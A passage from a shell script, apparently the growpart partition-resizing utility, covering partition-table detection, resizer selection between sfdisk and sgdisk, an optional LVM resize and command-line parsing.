2>"$TEMP_D/$label.err" ret=$? else "$@" >"$TEMP_D/$label.err" 2>&1 ret=$? fi if [ $ret -ne 0 ]; then error "failed [$label:$ret]" "$@" cat "$efile" 1>&2 fi return $ret } rqe() { local _capture="erronly" rq "$@" } verify_ptupdate() { local input="$1" found="" reason="" kver="" # we can always satisfy 'off' if [ "$input" = "off" ]; then _RET="false"; return 0; fi if command -v partx >/dev/null 2>&1; then local out="" ret=0 out=$(partx --help 2>&1) ret=$? if [ $ret -eq 0 ]; then echo "$out" | grep -q -- --update || { reason="partx has no '--update' flag in usage." found="off" } else reason="'partx --help' returned $ret. assuming it is old." found="off" fi else reason="no 'partx' command" found="off" fi if [ -z "$found" ]; then if [ "$(uname)" != "Linux" ]; then reason="Kernel is not Linux per uname." found="off" fi fi if [ -z "$found" ]; then kver=$(uname -r) || debug 1 "uname -r failed!" if ! kver_cmp "${kver-0.0.0}" -ge 3.8.0; then reason="Kernel '$kver' < 3.8.0." found="off" fi fi if [ -z "$found" ]; then _RET="true" return 0 fi case "$input" in on) error "$reason"; return 1;; auto) _RET="false"; debug 1 "partition update disabled: $reason" return 0;; force) _RET="true" error "WARNING: ptupdate forced on even though: $reason" return 0;; esac error "unknown input '$input'"; return 1; } pt_update() { local dev="$1" part="$2" update="${3:-$PT_UPDATE}" if ! $update; then return 0 fi # partx only works on block devices (do not run on file) [ -b "$dev" ] || return 0 partx --update --nr "$part" "$dev" } has_cmd() { command -v "${1}" >/dev/null 2>&1 } resize_sgdisk_gpt() { resize_sgdisk gpt } resize_sgdisk_dos() { fail "unable to resize dos label with sgdisk" } resize_sfdisk_gpt() { resize_sfdisk gpt } resize_sfdisk_dos() { resize_sfdisk dos } get_table_format() { local out="" disk="$1" if has_cmd blkid && blkid --version | grep -q util-linux && out=$(blkid -o value -s PTTYPE "$disk") && [ "$out" = "dos" -o "$out" = "gpt" ]; then _RET="$out" return fi _RET="dos" if [ -z "$SFDISK" ]; then out=$(LANG=C sgdisk --print "$disk") || { error "Could not determine partition table format of $disk" \ "with 'sgdisk --print $disk'" return 1 } # looking for a message like: # Found invalid GPT and valid MBR; converting MBR to GPT format case "$out" in *\ valid\ MBR\ *) _RET="dos";; *) _RET="gpt";; esac return elif [ ${SFDISK_VERSION} -lt ${SFDISK_2_26} ] && out=$(sfdisk --id --force "$disk" 1 2>/dev/null); then if [ "$out" = "ee" ]; then _RET="gpt" else _RET="dos" fi return elif out=$(LANG=C sfdisk --list "$disk"); then out=$(echo "$out" | sed -e '/Disklabel type/!d' -e 's/.*: //') case "$out" in gpt|dos) _RET="$out";; *) error "WARN: unknown label $out";; esac fi } get_resizer() { local format="$1" user=${2:-"auto"} case "$user" in sgdisk) _RET="resize_sgdisk_$format"; return;; sfdisk) _RET="resize_sfdisk_$format"; return;; auto) :;; *) error "unexpected value '$user' for growpart resizer"; return 1;; esac if [ "$format" = "dos" ]; then [ -n "$SFDISK" ] || { error "sfdisk is required for resizing dos/MBR partition table." return 1 } _RET="resize_sfdisk_dos" return 0 fi if [ "${SFDISK_VERSION}" -ge ${SFDISK_V_WORKING_GPT} ]; then # sfdisk 2.26.2 works for resize but loses type (LP: #1474090) _RET="resize_sfdisk_gpt" elif has_cmd sgdisk; then _RET="resize_sgdisk_$format" else error "no tools available to resize disk with '$format'" return 1 fi return 0 } maybe_lvm_resize() { local disk="$1" part="$2" partpath="" ret="" out="" wouldrun="" [ "$DRY_RUN" -ne 0 ] && wouldrun="would-run" has_cmd lvm || { debug 2 "No lvm command, cannot attempt lvm resize of disk '$disk' part '$part'" return 0 } get_diskpart_path "$1" "$2" || { error "could not determine partition path for disk '$DISK' part '$part'" return 1 } partpath="$_RET" # can't use rq or rqe here because of "not an lvm" exit code 5. set -- lvm pvs --nolocking --readonly -o pvname "$partpath" debug 2 "executing: $*" out=$("$@" 2>&1) ret=$? case "$ret" in 5) debug 1 "$partpath is not an lvm pv"; return 0;; 0) :;; *) error "failed to execute [$ret] '$*'" error "$out" return 1;; esac rq lvm_resize $wouldrun lvm pvresize "$partpath" || { error "Failed to resize lvm pv $partpath" return 1 } return 0 } pt_update="auto" resizer=${GROWPART_RESIZER:-"auto"} while [ $# -ne 0 ]; do cur=${1} next=${2} case "$cur" in -h|--help) Usage exit 0 ;; --free-percent|--free-percent=*) if [ "${cur#--free-percent=}" != "$cur" ]; then next="${cur#--free-percent=}" else shift fi if [ "$next" -gt 0 ] 2>/dev/null && [ "$next" -lt 100 ] 2>/dev/null; then free_percent=$next else fail "unknown/invalid --free-percent option: $next" fi ;; --fudge) FUDGE=${next} shift ;; -N|--dry-run) DRY_RUN=1 ;; -u|--update|--update=*) if [ "${cur#--update=}" != "$cur" ]; then next="${cur#--update=}" else shift fi case "$next" in off|auto|force|on) pt_update=$next;; *) fail "unknown --update option: $next";; esac ;; -v|--verbose) VERBOSITY=$(($VERBOSITY+1)) ;; --) shift break ;; -*) fail "unknown option ${cur}" ;; *) if [ -z "${DISK}" ]; then DISK=${cur} else [ -z "${PART}" ] || fail "confused by arg ${cur}" PART=${cur} fi ;; esac shift done [ -n "${DISK}" ] || bad_Usage "must supply disk and partition-number" [ -n "${PART}" ] || bad_Usage "must supply partition-number" [ -e "${DISK}" ] || fail "${DISK}: does not exist" # cache the has_cmd return value. has_cmd sfdisk && SFDISK=sfdisk || SFDISK="" has_cmd sgdisk && SGDISK=sgdisk || SGDISK="" [ -n "$SGDISK" -o -n "$SFDISK" ] || fail "Did not have sfdisk or sgdisk in PATH." get_sfdisk_version || fail # If $DISK is a symlink, resolve it. # This avoids problems due to varying partition device name formats # (e.g. "1" for /dev/sda vs "-part1" for /dev/disk/by-id/name) if [ -L "${DISK}" ]; then has_cmd readlink || fail "${DISK} is a symlink, but 'readlink' command not available." real_disk=$(readlink -f "${DISK}") || fail "unable to resolve ${DISK}" debug 1 "${DISK} resolved to ${real_disk}" DISK=${real_disk} fi [ "${PART#*[!0-9]}" = "${PART}" ] || fail "partition-number must be a number" verify_ptupdate "$pt_update" || fail PT_UPDATE=$_RET debug 1 "update-partition set to $PT_UPDATE" mktemp_d && TEMP_D="${_RET}" || fail "failed to make temp dir" trap cleanup 0 # EXIT - some shells may not like 'EXIT' but are ok with 0 # get the ID of the first partition to determine if it's MBR or GPT get_table_format "$DISK" || fail format=$_RET get_resizer "$format" "$resizer" || fail "failed to get a resizer for format '$format'" resizer=$_RET lock_disk $DISK debug 1 "resizing $PART on $DISK using $resizer" "$resizer" ret=$? unlock_disk_and_settle $DISK if [ "$RESIZE_RESULT" = "CHANGED" -o "$RESIZE_RESULT" = "CHANGE" ]; then maybe_lvm_resize "$DISK" "$PART" || fail "lvm resize failed." fi exit $ret # vi: ts=4 noexpandtab
Close